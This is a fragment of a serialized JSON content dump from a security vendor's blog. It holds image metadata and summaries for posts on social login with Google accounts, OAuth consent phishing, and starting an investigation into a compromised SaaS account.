login",{"url":335410,"width":333817,"height":335411},"https://images.ctfassets.net/y1cdw1ablpvd/6pEiqSetxWVLelN31IKEeY/c0d22fd96149753ebc08d05b79c398c5/image6.png",922,{"sys":335413,"__typename":5345,"title":335414,"caption":335415,"layoutMode":118,"file":335416},{"id":334860},"Login with Google example","Choose which Google account to login with",{"url":335417,"width":333817,"height":335411},"https://images.ctfassets.net/y1cdw1ablpvd/n3VMAqOZNNsOoQrdjZyvS/79e6a4d8c33add2d014be89457907da1/image4.png",{"sys":335419,"__typename":5345,"title":335420,"caption":335420,"layoutMode":118,"file":335421},{"id":334880},"Push OAuth (third-party integration) details panel",{"url":335422,"width":335423,"height":53620},"https://images.ctfassets.net/y1cdw1ablpvd/5LRUtkyeQF3RvD7V9KVBNV/4bd2f9cb0b0709a74a32259543461d45/image3.png",733,{"sys":335425,"__typename":5345,"title":335426,"caption":335426,"layoutMode":118,"file":335427},{"id":334893},"Permission request from Google",{"url":335428,"width":333817,"height":134216},"https://images.ctfassets.net/y1cdw1ablpvd/4oCVoWws9dIB52qS3dXqdv/5cb3dd2d3be0295443853b86ac0afbba/image2.png",{"sys":335430,"__typename":5345,"title":335431,"caption":335432,"layoutMode":118,"file":335433},{"id":334899},"Adobe wants to access your Google account","Adobe connecting to Google",{"url":335434,"width":333817,"height":335435},"https://images.ctfassets.net/y1cdw1ablpvd/AdvCDGO8Hqow3GhbA8JVv/dc70d323c1e5cce3e78e257b481b16a2/image1.png",1566,{"sys":335437,"__typename":5345,"title":335438,"caption":335438,"layoutMode":118,"file":335439},{"id":334912},"Acrobat requesting permission to access Google ",{"url":335440,"width":333817,"height":310486},"https://images.ctfassets.net/y1cdw1ablpvd/6Mai9NoebpGJvZBv4yUyDZ/98e63a152b4cdd7608195f10240604d6/image5.png",{"sys":335442,"__typename":5345,"title":335443,"caption":335444,"layoutMode":118,"file":335445},{"id":334925},"Push's OAuth integration panel Adobe","Push's OAuth integration panel for the Adobe app",{"url":335446,"width":335423,"height":53620},"https://images.ctfassets.net/y1cdw1ablpvd/6bAz2nvGdkJYA45K7Sfwh/4c09eb10980f8f94f05b9ccaa1f97227/image7.png",{"sys":335448,"__typename":335449,"content":335450,"title":335461,"buttonText":335462,"buttonUrl":335463,"signupRedirectUrl":118},{"id":318410},"ActionBlockComponent",{"json":335451},{"nodeType":165,"data":335452,"content":335453},{},[335454],{"nodeType":178,"content":335455,"data":335460},[335456],{"nodeType":173,"value":335457,"marks":335458,"data":335459},"Find out if you have any malicious apps that employees have accidentally installed due to consent phishing. Note: you must be logged in to access.",[],{},{},"Detect risky third-party apps and malicious mail rules ","Check now","/app/feature/secure-oauth-permissions-and-applications/","content:blog:is-it-safe-to-allow-my-employees-to-connect-third-party-apps-to-our-m365.json","blog/is-it-safe-to-allow-my-employees-to-connect-third-party-apps-to-our-m365.json","blog/is-it-safe-to-allow-my-employees-to-connect-third-party-apps-to-our-m365",{"_path":335468,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":335469,"ogImage":118,"summary":335471,"relatedBlogPostsCollection":335482,"title":284931,"subtitle":118,"metaTitle":335484,"synopsis":331239,"hashTags":118,"publishedDate":331240,"slug":284932,"tagsCollection":335485,"authorsCollection":335491,"content":335495,"_id":335845,"_type":5439,"_source":5440,"_file":335846,"_stem":335847,"_extension":5439},"/blog/should-i-let-my-employees-login-with-their-work-google-account",{"id":273995,"publishedAt":335470},"2024-03-21T09:01:39.047Z",{"json":335472},{"data":335473,"content":335474,"nodeType":165},{},[335475],{"data":335476,"content":335477,"nodeType":178},{},[335478],{"data":335479,"marks":335480,"value":335481,"nodeType":173},{},[],"Is logging in with Google or Microsoft secure? Yes, with a few caveats. Known as \"social logins,\" they're good for business use for third-party SaaS platforms, not just for personal use. They save time and bring many security benefits in most cases too. \n",{"items":335483},[],"Is it safe to let my employees login with Google?",{"items":335486},[335487,335489],{"sys":335488,"name":26133},{"id":26132},{"sys":335490,"name":26137},{"id":26136},{"items":335492},[335493],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":335494},{"url":8615},{"json":335496,"links":335818},{"data":335497,"content":335498,"nodeType":165},{},[335499,335505,335511,335516,335522,335527,335533,335539,335545,335551,335557,335562,335568,335574,335580,335596,335612,335628,335654,335677,335693,335699,335705,335711,335717,335723,335729,335745,335772,335778,335794,335800,335806,335812],{"data":335500,"content":335501,"nodeType":178},{},[335502],{"data":335503,"marks":335504,"value":330880,"nodeType":173},{},[],{"data":335506,"content":335507,"nodeType":178},{},[335508],{"data":335509,"marks":335510,"value":330887,"nodeType":173},{},[],{"data":335512,"content":335515,"nodeType":312},{"target":335513},{"sys":335514},{"id":330892,"type":317,"linkType":318},[],{"data":335517,"content":335518,"nodeType":178},{},[335519],{"data":335520,"marks":335521,"value":330900,"nodeType":173},{},[],{"data":335523,"content":335526,"nodeType":312},{"target":335524},{"sys":335525},{"id":330905,"type":317,"linkType":318},[],{"data":335528,"content":335529,"nodeType":235},{},[335530],{"data":335531,"marks":335532,"value":330913,"nodeType":173},{},[],{"data":335534,"content":335535,"nodeType":178},{},[335536],{"data":335537,"marks":335538,"value":330920,"nodeType":173},{},[],{"data":335540,"content":335541,"nodeType":178},{},[335542],{"data":335543,"marks":335544,"value":330927,"nodeType":173},{},[],{"data":335546,"content":335547,"nodeType":178},{},[335548],{"data":335549,"marks":335550,"value":330934,"nodeType":173},{},[],{"data":335552,"content":335553,"nodeType":178},{},[335554],{"data":335555,"marks":335556,"value":330941,"nodeType":173},{},[],{"data":335558,"content":335561,"nodeType":312},{"target":335559},{"sys":335560},{"id":330946,"type":317,"linkType":318},[],{"data":335563,"content":335564,"nodeType":178},{},[335565],{"data":335566,"marks":335567,"value":330954,"nodeType":173},{},[],{"data":335569,"content":335570,"nodeType":169},{},[335571],{"data":335572,"marks":335573,"value":330961,"nodeType":173},{},[],{"data":335575,"content":335576,"nodeType":178},{},[335577],{"data":335578,"marks":335579,"value":330968,"nodeType":173},{},[],{"data":335581,"content":335582,"nodeType":250},{},[335583],{"data":335584,"content":335585,"nodeType":254},{},[335586],{"data":335587,"content":335588,"nodeType":178},{},[335589,335593],{"data":335590,"marks":335591,"value":330982,"nodeType":173},{},[335592],{"type":370},{"data":335594,"marks":335595,"value":330986,"nodeType":173},{},[],{"data":335597,"content":335598,"nodeType":250},{},[335599],{"data":335600,"content":335601,"nodeType":254},{},[335602],{"data":335603,"content":335604,"nodeType":178},{},[335605,335609],{"data":335606,"marks":335607,"value":331000,"nodeType":173},{},[335608],{"type":370},{"data":335610,"marks":335611,"value":331004,"nodeType":173},{},[],{"data":335613,"content":335614,"nodeType":250},{},[335615],{"data":335616,"content":335617,"nodeType":254},{},[335618],{"data":335619,"content":335620,"nodeType":178},{},[335621,335625],{"data":335622,"marks":335623,"value":331018,"nodeType":173},{},[335624],{"type":370},{"data":335626,"marks":335627,"value":331022,"nodeType":173},{},[],{"data":335629,"content":335630,"nodeType":250},{},[335631],{"data":335632,"content":335633,"nodeType":254},{},[335634],{"data":335635,"content":335636,"nodeType":178},{},[335637,335641,335644,335651],{"data":335638,"marks":335639,"value":331036,"nodeType":173},{},[335640],{"type":370},{"data":335642,"marks":335643,"value":331040,"nodeType":173},{},[],{"data":335645,"content":335646,"nodeType":186},{"uri":331043},[335647],{"data":335648,"marks":335649,"value":331043,"nodeType":173},{},[335650],{"type":194},{"data":335652,"marks":335653,"value":74584,"nodeType":173},{},[],{"data":335655,"content":335656,"nodeType":250},{},[335657],{"data":335658,"content":335659,"nodeType":254},{},[335660],{"data":335661,"content":335662,"nodeType":178},{},[335663,335667,335670,335674],{"data":335664,"marks":335665,"value":331065,"nodeType":173},{},[335666],{"type":370},{"data":335668,"marks":335669,"value":331069,"nodeType":173},{},[],{"data":335671,"marks":335672,"value":331074,"nodeType":173},{},[335673],{"type":370},{"data":335675,"marks":335676,"value":197,"nodeType":173},{},[],{"data":335678,"content":335679,"nodeType":250},{},[335680],{"data":335681,"content":335682,"nodeType":254},{},[335683],{"data":335684,"content":335685,"nodeType":178},{},[335686,335690],{"data":335687,"marks":335688,"value":331091,"nodeType":173},{},[335689],{"type":370},{"data":335691,"marks":335692,"value":331095,"nodeType":173},{},[],{"data":335694,"content":335695,"nodeType":178},{},[335696],{"data":335697,"marks":335698,"value":331102,"nodeType":173},{},[],{"data":335700,"content":335701,"nodeType":178},{},[335702],{"data":335703,"marks":335704,"value":331109,"nodeType":173},{},[],{"data":335706,"content":335707,"nodeType":178},{},[335708],{"data":335709,"marks":335710,"value":331116,"nodeType":173},{},[],{"data":335712,"content":335713,"nodeType":178},{},[335714],{"data":335715,"marks":335716,"value":331123,"nodeType":173},{},[],{"data":335718,"content":335719,"nodeType":169},{},[335720],{"data":335721,"marks":335722,"value":331130,"nodeType":173},{},[],{"data":335724,"content":335725,"nodeType":178},{},[335726],{"data":335727,"marks":335728,"value":331137,"nodeType":173},{},[],{"data":335730,"content":335731,"nodeType":250},{},[335732],{"data":335733,"content":335734,"nodeType":254},{},[335735],{"data":335736,"content":335737,"nodeType":178},{},[335738,335742],{"data":335739,"marks":335740,"value":331151,"nodeType":173},{},[335741],{"type":370},{"data":335743,"marks":335744,"value":331155,"nodeType":173},{},[],{"data":335746,"content":335747,"nodeType":178},{},[335748,335751,335759,335762,335769],{"data":335749,"marks":335750,"value":331162,"nodeType":173},{},[],{"data":335752,"content":335755,"nodeType":1698},{"target":335753},{"sys":335754},{"id":269414,"type":317,"linkType":318},[335756],{"data":335757,"marks":335758,"value":331171,"nodeType":173},{},[],{"data":335760,"marks":335761,"value":331175,"nodeType":173},{},[],{"data":335763,"content":335764,"nodeType":186},{"uri":331178},[335765],{"data":335766,"marks":335767,"value":37,"nodeType":173},{},[335768],{"type":194},{"data":335770,"marks":335771,"value":37,"nodeType":173},{},[],{"data":335773,"content":335774,"nodeType":178},{},[335775],{"data":335776,"marks":335777,"value":331193,"nodeType":173},{},[],{"data":335779,"content":335780,"nodeType":250},{},[335781],{"data":335782,"content":335783,"nodeType":254},{},[335784],{"data":335785,"content":335786,"nodeType":178},{},[335787,335791],{"data":335788,"marks":335789,"value":331207,"nodeType":173},{},[335790],{"type":370},{"data":335792,"marks":335793,"value":331211,"nodeType":173},{},[],{"data":335795,"content":335796,"nodeType":178},{},[335797],{"data":335798,"marks":335799,"value":331218,"nodeType":173},{},[],{"data":335801,"content":335802,"nodeType":178},{},[335803],{"data":335804,"marks":335805,"value":331225,"nodeType":173},{},[],{"data":335807,"content":335808,"nodeType":169},{},[335809],{"data":335810,"marks":335811,"value":40632,"nodeType":173},{},[],{"data":335813,"content":335814,"nodeType":178},{},[335815],{"data":335816,"marks":335817,"value":331238,"nodeType":173},{},[],{"entries":335819},{"inline":335820,"hyperlink":335821,"block":335824},[],[335822],{"sys":335823,"__typename":1528,"title":271616,"slug":271619},{"id":269414},[335825,335833,335839],{"sys":335826,"__typename":5345,"title":335827,"caption":335828,"layoutMode":118,"file":335829},{"id":330892},"Social login example","A login screen with social login options at the bottom",{"url":335830,"width":335831,"height":335832},"https://images.ctfassets.net/y1cdw1ablpvd/4TpasR3oajTsO7niFNWI4Q/181ea2d23f834ea11e1d423b08740128/image1.png",621,807,{"sys":335834,"__typename":127689,"title":335835,"youTubeUrl":335836,"imagePlaceholder":335837},{"id":330905},"Social login explainer","https://www.youtube.com/watch?v=4UKqwHbUcGE",{"url":335838,"width":49163,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/4pV0U6iANDJSs3bpGtiYRo/dea76d9d7ee85be0fa3606da87a14fba/11.png",{"sys":335840,"__typename":5345,"title":335841,"caption":335842,"layoutMode":118,"file":335843},{"id":330946},"Social login step 2","The second step of a social login ",{"url":335844,"width":134270,"height":173178},"https://images.ctfassets.net/y1cdw1ablpvd/17wCopJ8dDvapmw9LMoQk4/0a1a46ba9bfbd9339e85360db4e422b6/image2.png","content:blog:should-i-let-my-employees-login-with-their-work-google-account.json","blog/should-i-let-my-employees-login-with-their-work-google-account.json","blog/should-i-let-my-employees-login-with-their-work-google-account",{"_path":335849,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":335850,"ogImage":118,"summary":335852,"title":288168,"subtitle":118,"metaTitle":335863,"synopsis":318418,"hashTags":118,"publishedDate":318419,"slug":288169,"tagsCollection":335864,"relatedBlogPostsCollection":335870,"authorsCollection":336319,"content":336323,"_id":336777,"_type":5439,"_source":5440,"_file":336778,"_stem":336779,"_extension":5439},"/blog/how-to-kick-off-an-incident-response-investigation-for-a-compromised-saas",{"id":274110,"publishedAt":335851},"2024-03-21T09:07:17.261Z",{"json":335853},{"data":335854,"content":335855,"nodeType":165},{},[335856],{"data":335857,"content":335858,"nodeType":178},{},[335859],{"data":335860,"marks":335861,"value":335862,"nodeType":173},{},[],"Learn how to quickly detect and mitigate business email compromise (BEC).","How to kick off an investigation for a compromised account",{"items":335865},[335866,335868],{"sys":335867,"name":509},{"id":508},{"sys":335869,"name":26137},{"id":26136},{"items":335871},[335872,336033],{"__typename":1528,"sys":335873,"content":335874,"title":271616,"synopsis":271617,"hashTags":118,"publishedDate":271618,"slug":271619,"tagsCollection":336023,"authorsCollection":336029},{"id":269414},{"json":335875},{"nodeType":165,"data":335876,"content":335877},{},[335878,335884,335890,335895,335908,335913,335919,335925,335949,335954,335969,335984,335999],{"nodeType":178,"data":335879,"content":335880},{},[335881],{"nodeType":173,"value":271448,"marks":335882,"data":335883},[],{},{"nodeType":178,"data":335885,"content":335886},{},[335887],{"nodeType":173,"value":271455,"marks":335888,"data":335889},[],{},{"nodeType":312,"data":335891,"content":335894},{"target":335892},{"sys":335893},{"id":271462,"type":317,"linkType":318},[],{"nodeType":178,"data":335896,"content":335897},{},[335898,335901,335905],{"nodeType":173,"value":271468,"marks":335899,"data":335900},[],{},{"nodeType":173,"value":271472,"marks":335902,"data":335904},[335903],{"type":370},{},{"nodeType":173,"value":271477,"marks":335906,"data":335907},[],{},{"nodeType":312,"data":335909,"content":335912},{"target":335910},{"sys":335911},{"id":271484,"type":317,"linkType":318},[],{"nodeType":178,"data":335914,"content":335915},{},[335916],{"nodeType":173,"value":271490,"marks":335917,"data":335918},[],{},{"nodeType":178,"data":335920,"content":335921},{},[335922],{"nodeType":173,"value":271497,"marks":335923,"data":335924},[],{},{"nodeType":178,"data":335926,"content":335927},{},[335928,335931,335937,335940,335946],{"nodeType":173,"value":271504,"marks":335929,"data":335930},[],{},{"nodeType":186,"data":335932,"content":335933},{"uri":271509},[335934],{"nodeType":173,"value":211147,"marks":335935,"data":335936},[],{},{"nodeType":173,"value":933,"marks":335938,"data":335939},[],{},{"nodeType":186,"data":335941,"content":335942},{"uri":271519},[335943],{"nodeType":173,"value":211157,"marks":335944,"data":335945},[],{},{"nodeType":173,"value":1477,"marks":335947,"data":335948},[],{},{"nodeType":312,"data":335950,"content":335953},{"target":335951},{"sys":335952},{"id":271531,"type":317,"linkType":318},[],{"nodeType":178,"data":335955,"content":335956},{},[335957,335960,335966],{"nodeType":173,"value":271537,"marks":335958,"data":335959},[],{},{"nodeType":186,"data":335961,"content":335962},{"uri":271542},[335963],{"nodeType":173,"value":271545,"marks":335964,"data":335965},[],{},{"nodeType":173,"value":271549,"marks":335967,"data":335968},[],{},{"nodeType":178,"data":335970,"content":335971},{},[335972,335975,335981],{"nodeType":173,"value":271556,"marks":335973,"data":335974},[],{},{"nodeType":186,"data":335976,"content":335977},{"uri":271561},[335978],{"nodeType":173,"value":148689,"marks":335979,"data":335980},[],{},{"nodeType":173,"value":271567,"marks":335982,"data":335983},[],{},{"nodeType":178,"data":335985,"content":335986},{},[335987,335990,335996],{"nodeType":173,"value":271574,"marks":335988,"data":335989},[],{},{"nodeType":186,"data":335991,"content":335992},{"uri":271579},[335993],{"nodeType":173,"value":271582,"marks":335994,"data":335995},[],{},{"nodeType":173,"value":271586,"marks":335997,"data":335998},[],{},{"nodeType":178,"data":336000,"content":336001},{},[336002,336005,336011,336014,336020],{"nodeType":173,"value":271593,"marks":336003,"data":336004},[],{},{"nodeType":186,"data":336006,"content":336007},{"uri":117883},[336008],{"nodeType":173,"value":271600,"marks":336009,"data":336010},[],{},{"nodeType":173,"value":2936,"marks":336012,"data":336013},[],{},{"nodeType":186,"data":336015,"content":336016},{"uri":117869},[336017],{"nodeType":173,"value":117876,"marks":336018,"data":336019},[],{},{"nodeType":173,"value":271613,"marks":336021,"data":336022},[],{},{"items":336024},[336025,336027],{"sys":336026,"name":505},{"id":504},{"sys":336028,"name":509},{"id":508},{"items":336030},[336031],{"fullName":271629,"firstName":71176,"jobTitle":271630,"profilePicture":336032},{"url":271632},{"__typename":1528,"sys":336034,"content":336035,"title":317937,"synopsis":317938,"hashTags":336308,"publishedDate":317940,"slug":317941,"tagsCollection":336309,"authorsCollection":336315},{"id":317617},{"json":336036},{"data":336037,"content":336038,"nodeType":165},{},[336039,336054,336060,336084,336097,336103,336109,336115,336122,336128,336144,336150,336166,336171,336178,336184,336200,336207,336223,336230,336236,336284,336291,336297,336302],{"data":336040,"content":336041,"nodeType":178},{},[336042,336045,336051],{"data":336043,"marks":336044,"value":317628,"nodeType":173},{},[],{"data":336046,"content":336047,"nodeType":186},{"uri":317631},[336048],{"data":336049,"marks":336050,"value":317636,"nodeType":173},{},[],{"data":336052,"marks":336053,"value":317640,"nodeType":173},{},[],{"data":336055,"content":336056,"nodeType":235},{},[336057],{"data":336058,"marks":336059,"value":317647,"nodeType":173},{},[],{"data":336061,"content":336062,"nodeType":178},{},[336063,336066,336070,336073,336081],{"data":336064,"marks":336065,"value":317654,"nodeType":173},{},[],{"data":336067,"marks":336068,"value":317659,"nodeType":173},{},[336069],{"type":370},{"data":336071,"marks":336072,"value":317663,"nodeType":173},{},[],{"data":336074,"content":336077,"nodeType":1698},{"target":336075},{"sys":336076},{"id":317512,"type":317,"linkType":318},[336078],{"data":336079,"marks":336080,"value":317672,"nodeType":173},{},[],{"data":336082,"marks":336083,"value":317676,"nodeType":173},{},[],{"data":336085,"content":336086,"nodeType":178},{},[336087,336090,336094],{"data":336088,"marks":336089,"value":317683,"nodeType":173},{},[],{"data":336091,"marks":336092,"value":317688,"nodeType":173},{},[336093],{"type":370},{"data":336095,"marks":336096,"value":317692,"nodeType":173},{},[],{"data":336098,"content":336099,"nodeType":235},{},[336100],{"data":336101,"marks":336102,"value":317699,"nodeType":173},{},[],{"data":336104,"content":336105,"nodeType":178},{},[336106],{"data":336107,"marks":336108,"value":317706,"nodeType":173},{},[],{"data":336110,"content":336111,"nodeType":178},{},[336112],{"data":336113,"marks":336114,"value":317713,"nodeType":173},{},[],{"data":336116,"content":336117,"nodeType":178},{},[336118],{"data":336119,"marks":336120,"value":317721,"nodeType":173},{},[336121],{"type":370},{"data":336123,"content":336124,"nodeType":178},{},[336125],{"data":336126,"marks":336127,"value":317728,"nodeType":173},{},[],{"data":336129,"content":336130,"nodeType":178},{},[336131,336134,336141],{"data":336132,"marks":336133,"value":317735,"nodeType":173},{},[],{"data":336135,"content":336136,"nodeType":186},{"uri":317738},[336137],{"data":336138,"marks":336139,"value":317744,"nodeType":173},{},[336140],{"type":194},{"data":336142,"marks":336143,"value":317748,"nodeType":173},{},[],{"data":336145,"content":336146,"nodeType":178},{},[336147],{"data":336148,"marks":336149,"value":317755,"nodeType":173},{},[],{"data":336151,"content":336152,"nodeType":178},{},[336153,336156,336163],{"data":336154,"marks":336155,"value":317762,"nodeType":173},{},[],{"data":336157,"content":336158,"nodeType":186},{"uri":317765},[336159],{"data":336160,"marks":336161,"value":317771,"nodeType":173},{},[336162],{"type":194},{"data":336164,"marks":336165,"value":317775,"nodeType":173},{},[],{"data":336167,"content":336170,"nodeType":312},{"target":336168},{"sys":336169},{"id":317780,"type":317,"linkType":318},[],{"data":336172,"content":336173,"nodeType":178},{},[336174],{"data":336175,"marks":336176,"value":317789,"nodeType":173},{},[336177],{"type":370},{"data":336179,"content":336180,"nodeType":178},{},[336181],{"data":336182,"marks":336183,"value":317796,"nodeType":173},{},[],{"data":336185,"content":336186,"nodeType":178},{},[336187,336190,336197],{"data":336188,"marks":336189,"value":317803,"nodeType":173},{},[],{"data":336191,"content":336192,"nodeType":186},{"uri":317806},[336193],{"data":336194,"marks":336195,"value":317812,"nodeType":173},{},[336196],{"type":194},{"data":336198,"marks":336199,"value":317816,"nodeType":173},{},[],{"data":336201,"content":336202,"nodeType":178},{},[336203],{"data":336204,"marks":336205,"value":317824,"nodeType":173},{},[336206],{"type":370},{"data":336208,"content":336209,"nodeType":178},{},[336210,336213,336220],{"data":336211,"marks":336212,"value":317831,"nodeType":173},{},[],{"data":336214,"content":336215,"nodeType":186},{"uri":317834},[336216],{"data":336217,"marks":336218,"value":317840,"nodeType":173},{},[336219],{"type":194},{"data":336221,"marks":336222,"value":1477,"nodeType":173},{},[],{"data":336224,"content":336225,"nodeType":178},{},[336226],{"data":336227,"marks":336228,"value":317851,"nodeType":173},{},[336229],{"type":370},{"data":336231,"content":336232,"nodeType":178},{},[336233],{"data":336234,"marks":336235,"value":317858,"nodeType":173},{},[],{"data":336237,"content":336238,"nodeType":250},{},[336239,336248,336257,336266,336275],{"data":336240,"content":336241,"nodeType":254},{},[336242],{"data":336243,"content":336244,"nodeType":178},{},[336245],{"data":336246,"marks":336247,"value":317871,"nodeType":173},{},[],{"data":336249,"content":336250,"nodeType":254},{},[336251],{"data":336252,"content":336253,"nodeType":178},{},[336254],{"data":336255,"marks":336256,"value":317881,"nodeType":173},{},[],{"data":336258,"content":336259,"nodeType":254},{},[336260],{"data":336261,"content":336262,"nodeType":178},{},[336263],{"data":336264,"marks":336265,"value":317891,"nodeType":173},{},[],{"data":336267,"content":336268,"nodeType":254},{},[336269],{"data":336270,"content":336271,"nodeType":178},{},[336272],{"data":336273,"marks":336274,"value":317901,"nodeType":173},{},[],{"data":336276,"content":336277,"nodeType":254},{},[336278],{"data":336279,"content":336280,"nodeType":178},{},[336281],{"data":336282,"marks":336283,"value":317911,"nodeType":173},{},[],{"data":336285,"content":336286,"nodeType":178},{},[336287],{"data":336288,"marks":336289,"value":40632,"nodeType":173},{},[336290],{"type":370},{"data":336292,"content":336293,"nodeType":178},{},[336294],{"data":336295,"marks":336296,"value":317925,"nodeType":173},{},[],{"data":336298,"content":336301,"nodeType":312},{"target":336299},{"sys":336300},{"id":209109,"type":317,"linkType":318},[],{"data":336303,"content":336304,"nodeType":178},{},[336305],{"data":336306,"marks":336307,"value":37,"nodeType":173},{},[],[317597,317598,317599,317600,317601],{"items":336310},[336311,336313],{"sys":336312,"name":505},{"id":504},{"sys":336314,"name":509},{"id":508},{"items":336316},[336317],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":336318},{"url":19129},{"items":336320},[336321],{"fullName":155981,"firstName":155982,"jobTitle":155983,"profilePicture":336322},{"url":155985},{"json":336324,"links":336727},{"data":336325,"content":336326,"nodeType":165},{},[336327,336334,336341,336359,336366,336384,336390,336395,336401,336407,336413,336419,336425,336431,336437,336443,336449,336454,336460,336466,336472,336478,336494,336499,336505,336510,336516,336521,336527,336533,336539,336578,336584,336600,336606,336688,336704,336710,336716,336721],{"data":336328,"content":336329,"nodeType":178},{},[336330],{"data":336331,"marks":336332,"value":317965,"nodeType":173},{},[336333],{"type":1646},{"data":336335,"content":336336,"nodeType":178},{},[336337],{"data":336338,"marks":336339,"value":317973,"nodeType":173},{},[336340],{"type":1646},{"data":336342,"content":336343,"nodeType":178},{},[336344,336347,336356],{"data":336345,"marks":336346,"value":317980,"nodeType":173},{},[],{"data":336348,"content":336351,"nodeType":1698},{"target":336349},{"sys":336350},{"id":317985,"type":317,"linkType":318},[336352],{"data":336353,"marks":336354,"value":317991,"nodeType":173},{},[336355],{"type":194},{"data":336357,"marks":336358,"value":317995,"nodeType":173},{},[],{"data":336360,"content":336361,"nodeType":178},{},[336362],{"data":336363,"marks":336364,"value":318003,"nodeType":173},{},[336365],{"type":1646},{"data":336367,"content":336368,"nodeType":178},{},[336369,336372,336381],{"data":336370,"marks":336371,"value":318010,"nodeType":173},{},[],{"data":336373,"content":336376,"nodeType":1698},{"target":336374},{"sys":336375},{"id":269414,"type":317,"linkType":318},[336377],{"data":336378,"marks":336379,"value":318020,"nodeType":173},{},[336380],{"type":194},{"data":336382,"marks":336383,"value":318024,"nodeType":173},{},[],{"data":336385,"content":336386,"nodeType":178},{},[336387],{"data":336388,"marks":336389,"value":318031,"nodeType":173},{},[],{"data":336391,"content":336394,"nodeType":312},{"target":336392},{"sys":336393},{"id":318036,"type":317,"linkType":318},[],{"data":336396,"content":336397,"nodeType":178},{},[336398],{"data":336399,"marks":336400,"value":318044,"nodeType":173},{},[],{"data":336402,"content":336403,"nodeType":235},{},[336404],{"data":336405,"marks":336406,"value":318051,"nodeType":173},{},[],{"data":336408,"content":336409,"nodeType":178},{},[336410],{"data":336411,"marks":336412,"value":318058,"nodeType":173},{},[],{"data":336414,"content":336415,"nodeType":178},{},[336416],{"data":336417,"marks":336418,"value":318065,"nodeType":173},{},[],{"data":336420,"content":336421,"nodeType":235},{},[336422],{"data":336423,"marks":336424,"value":318072,"nodeType":173},{},[],{"data":336426,"content":336427,"nodeType":178},{},[336428],{"data":336429,"marks":336430,"value":318079,"nodeType":173},{},[],{"data":336432,"content":336433,"nodeType":178},{},[336434],{"data":336435,"marks":336436,"value":318086,"nodeType":173},{},[],{"data":336438,"content":336439,"nodeType":178},{},[336440],{"data":336441,"marks":336442,"value":318093,"nodeType":173},{},[],{"data":336444,"content":336445,"nodeType":178},{},[336446],{"data":336447,"marks":336448,"value":318100,"nodeType":173},{},[],{"data":336450,"content":336453,"nodeType":312},{"target":336451},{"sys":336452},{"id":318105,"type":317,"linkType":318},[],{"data":336455,"content":336456,"nodeType":178},{},[336457],{"data":336458,"marks":336459,"value":318113,"nodeType":173},{},[],{"data":336461,"content":336462,"nodeType":235},{},[336463],{"data":336464,"marks":336465,"value":318120,"nodeType":173},{},[],{"data":336467,"content":336468,"nodeType":178},{},[336469],{"data":336470,"marks":336471,"value":318127,"nodeType":173},{},[],{"data":336473,"content":336474,"nodeType":178},{},[336475],{"data":336476,"marks":336477,"value":318134,"nodeType":173},{},[],{"data":336479,"content":336480,"nodeType":178},{},[336481,336484,336491],{"data":336482,"marks":336483,"value":318141,"nodeType":173},{},[],{"data":336485,"content":336486,"nodeType":186},{"uri":270424},[336487],{"data":336488,"marks":336489,"value":270427,"nodeType":173},{},[336490],{"type":194},{"data":336492,"marks":336493,"value":318152,"nodeType":173},{},[],{"data":336495,"content":336498,"nodeType":312},{"target":336496},{"sys":336497},{"id":318157,"type":317,"linkType":318},[],{"data":336500,"content":336501,"nodeType":178},{},[336502],{"data":336503,"marks":336504,"value":318165,"nodeType":173},{},[],{"data":336506,"content":336509,"nodeType":312},{"target":336507},{"sys":336508},{"id":318170,"type":317,"linkType":318},[],{"data":336511,"content":336512,"nodeType":178},{},[336513],{"data":336514,"marks":336515,"value":318178,"nodeType":173},{},[],{"data":336517,"content":336520,"nodeType":312},{"target":336518},{"sys":336519},{"id":318183,"type":317,"linkType":318},[],{"data":336522,"content":336523,"nodeType":235},{},[336524],{"data":336525,"marks":336526,"value":318191,"nodeType":173},{},[],{"data":336528,"content":336529,"nodeType":178},{},[336530],{"data":336531,"marks":336532,"value":318198,"nodeType":173},{},[],{"data":336534,"content":336535,"nodeType":178},{},[336536],{"data":336537,"marks":336538,"value":318205,"nodeType":173},{},[],{"data":336540,"content":336541,"nodeType":250},{},[336542,336551,336560,336569],{"data":336543,"content":336544,"nodeType":254},{},[336545],{"data":336546,"content":336547,"nodeType":178},{},[336548],{"data":336549,"marks":336550,"value":318218,"nodeType":173},{},[],{"data":336552,"content":336553,"nodeType":254},{},[336554],{"data":336555,"content":336556,"nodeType":178},{},[336557],{"data":336558,"marks":336559,"value":318228,"nodeType":173},{},[],{"data":336561,"content":336562,"nodeType":254},{},[336563],{"data":336564,"content":336565,"nodeType":178},{},[336566],{"data":336567,"marks":336568,"value":318238,"nodeType":173},{},[],{"data":336570,"content":336571,"nodeType":254},{},[336572],{"data":336573,"content":336574,"nodeType":178},{},[336575],{"data":336576,"marks":336577,"value":318248,"nodeType":173},{},[],{"data":336579,"content":336580,"nodeType":178},{},[336581],{"data":336582,"marks":336583,"value":318255,"nodeType":173},{},[],{"data":336585,"content":336586,"nodeType":178},{},[336587,336590,336597],{"data":336588,"marks":336589,"value":318262,"nodeType":173},{},[],{"data":336591,"content":336592,"nodeType":186},{"uri":318265},[336593],{"data":336594,"marks":336595,"value":318271,"nodeType":173},{},[336596],{"type":194},{"data":336598,"marks":336599,"value":318275,"nodeType":173},{},[],{"data":336601,"content":336602,"nodeType":178},{},[336603],{"data":336604,"marks":336605,"value":318282,"nodeType":173},{},[],{"data":336607,"content":336608,"nodeType":250},{},[336609,336618,336627,336636,336655,336670,336679],{"data":336610,"content":336611,"nodeType":254},{},[336612],{"data":336613,"content":336614,"nodeType":178},{},[336615],{"data":336616,"marks":336617,"value":318295,"nodeType":173},{},[],{"data":336619,"content":336620,"nodeType":254},{},[336621],{"data":336622,"content":336623,"nodeType":178},{},[336624],{"data":336625,"marks":336626,"value":318305,"nodeType":173},{},[],{"data":336628,"content":336629,"nodeType":254},{},[336630],{"data":336631,"content":336632,"nodeType":178},{},[336633],{"data":336634,"marks":336635,"value":318315,"nodeType":173},{},[],{"data":336637,"content":336638,"nodeType":254},{},[336639],{"data":336640,"content":336641,"nodeType":178},{},[336642,336645,336652],{"data":336643,"marks":336644,"value":37,"nodeType":173},{},[],{"data":336646,"content":336647,"nodeType":186},{"uri":318327},[336648],{"data":336649,"marks":336650,"value":318333,"nodeType":173},{},[336651],{"type":194},{"data":336653,"marks":336654,"value":37